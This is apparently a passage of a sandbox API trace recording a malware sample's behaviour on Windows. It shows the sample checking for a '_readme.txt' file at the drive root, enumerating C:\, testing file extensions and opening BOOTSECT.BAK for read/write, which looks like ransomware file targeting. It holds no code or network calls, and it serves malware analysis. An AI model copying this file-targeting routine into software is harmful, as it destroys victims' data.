[0183.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.137] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.137] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.138] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.138] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.139] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.139] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.140] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.141] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.141] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x2ac4ee0 [0183.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.142] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc46) returned 0x2ade6e0 [0183.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x2ac4ee0 [0183.143] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.143] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.144] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x2ac4ee0 [0183.144] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.145] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.145] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x2ac4ee0 [0183.146] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.146] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0183.146] PathFindFileNameW (pszPath="") returned="" [0183.146] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759a0000 [0183.146] GetProcAddress (hModule=0x759a0000, lpProcName="SHGetFolderPathW") returned 0x75a25708 [0183.146] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x2ade6e0 [0183.146] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2ade6e0 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0183.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac4ee0 [0183.147] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ac4ee0 | out: hHeap=0x2c0000) returned 1 [0183.147] FreeLibrary (hLibModule=0x759a0000) returned 1 [0183.147] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.148] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x806) returned 0x2ade6e0 [0183.148] PathAppendW (in: pszPath="C:\\", pMore="_readme.txt" | out: pszPath="C:\\_readme.txt") returned 1 [0183.148] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x2ac4ee0 [0183.148] PathFileExistsW (pszPath="C:\\_readme.txt") returned 1 [0183.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ade6e0 | out: hHeap=0x2c0000) returned 1 [0183.149] FindFirstFileW (in: lpFileName="C:\\*" (normalized: "c:\\*"), lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x7f4e9560, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7f4e9560, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x2a05da8 [0183.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0183.149] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0183.149] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ef0 [0183.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0183.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0183.150] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0183.150] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x9565de80, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28df6900, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0183.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0183.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x38) returned 0x2a05de8 [0183.150] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0183.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0183.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.151] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ec8 | out: hHeap=0x2c0000) returned 1 [0183.151] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x9571c560, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28df6900, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr", cAlternateFileName="")) returned 1 [0183.151] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0183.152] PathFindExtensionW (pszPath="C:\\bootmgr") returned="" [0183.152] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ec8 | out: hHeap=0x2c0000) returned 1 [0183.152] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0x95957a00, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x95957a00, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0x95957a00, ftLastWriteTime.dwHighDateTime=0x1d70554, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0183.152] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0183.152] PathFindExtensionW (pszPath="C:\\BOOTSECT.BAK") returned=".BAK" [0183.152] CreateFileW (lpFileName="C:\\BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ec8 | out: hHeap=0x2c0000) returned 1 [0183.159] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0183.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b88 [0183.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x54) returned 0x29b9ed0 [0183.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0183.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0183.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0183.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05de8 | out: hHeap=0x2c0000) returned 1 [0183.160] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0183.160] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05b88 | out: hHeap=0x2c0000) returned 1 [0183.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.161] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0xa384ad20, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xa384ad20, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0xd6895580, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0183.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.161] PathFindExtensionW (pszPath="C:\\hiberfil.sys") returned=".sys" [0183.161] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.161] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xb883f1e0, ftCreationTime.dwHighDateTime=0x1d8a6e8, ftLastAccessTime.dwLowDateTime=0xb883f1e0, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xb883f1e0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0183.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x29fbcb0 [0183.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0183.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.161] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0183.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ec8 | out: hHeap=0x2c0000) returned 1 [0183.162] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0183.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9ed0 | out: hHeap=0x2c0000) returned 1 [0183.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0183.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.163] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xa37fea60, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xa37fea60, ftLastAccessTime.dwHighDateTime=0x1d70554, ftLastWriteTime.dwLowDateTime=0xd70c4120, ftLastWriteTime.dwHighDateTime=0x1d8a8d3, nFileSizeHigh=0x0, nFileSizeLow=0x7ff7c000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pagefile.sys", cAlternateFileName="")) returned 1 [0183.163] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.163] PathFindExtensionW (pszPath="C:\\pagefile.sys") returned=".sys" [0183.163] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.163] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd72e458, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PerfLogs", cAlternateFileName="")) returned 1 [0183.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa8) returned 0x29edc48 [0183.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0183.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0183.164] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e28 [0183.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0183.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e78 | out: hHeap=0x2c0000) returned 1 [0183.164] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0183.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ec8 | out: hHeap=0x2c0000) returned 1 [0183.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29fbcb0 | out: hHeap=0x2c0000) returned 1 [0183.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0183.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ea0 | out: hHeap=0x2c0000) returned 1 [0183.165] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0183.165] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xa4b500d0, ftLastAccessTime.dwHighDateTime=0x1d8a744, ftLastWriteTime.dwLowDateTime=0xa4b500d0, ftLastWriteTime.dwHighDateTime=0x1d8a744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files", cAlternateFileName="PROGRA~1")) returned 1 [0183.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0183.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0183.165] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0183.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0183.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0183.166] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd8ab1dc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1434c8c0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x1434c8c0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Program Files (x86)", cAlternateFileName="PROGRA~2")) returned 1 [0183.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0183.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42548 [0183.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xfc) returned 0x2f5b18 [0183.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42580 [0183.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0183.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0183.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ea0 [0183.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e78 [0183.166] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425f0 [0183.166] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0183.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e50 | out: hHeap=0x2c0000) returned 1 [0183.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05ab0 | out: hHeap=0x2c0000) returned 1 [0183.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e28 | out: hHeap=0x2c0000) returned 1 [0183.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ec8 | out: hHeap=0x2c0000) returned 1 [0183.167] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42510 | out: hHeap=0x2c0000) returned 1 [0183.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29edc48 | out: hHeap=0x2c0000) returned 1 [0183.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42510 [0183.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42548 | out: hHeap=0x2c0000) returned 1 [0183.168] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0183.168] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xfd943744, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1f2b3de0, ftLastAccessTime.dwHighDateTime=0x1d8a6e9, ftLastWriteTime.dwLowDateTime=0x1f2b3de0, ftLastWriteTime.dwHighDateTime=0x1d8a6e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ProgramData", cAlternateFileName="PROGRA~3")) returned 1 [0183.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0183.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e28 [0183.168] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e50 [0183.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e28 | out: hHeap=0x2c0000) returned 1 [0183.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ec8 | out: hHeap=0x2c0000) returned 1 [0183.169] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x7844bbf0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x78471d50, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x78471d50, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0183.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ec8 [0183.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e28 [0183.169] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7e00 [0183.169] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7e28 | out: hHeap=0x2c0000) returned 1 [0183.170] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ec8 | out: hHeap=0x2c0000) returned 1 [0183.170] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xa3740380, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0xbd8bb9c0, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xbd8bb9c0, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="SYSTEM~1")) returned 1 [0183.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05ab0 [0183.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05b88 [0183.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16c) returned 0x29dcde8 [0183.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0183.170] RtlAllocateHeap 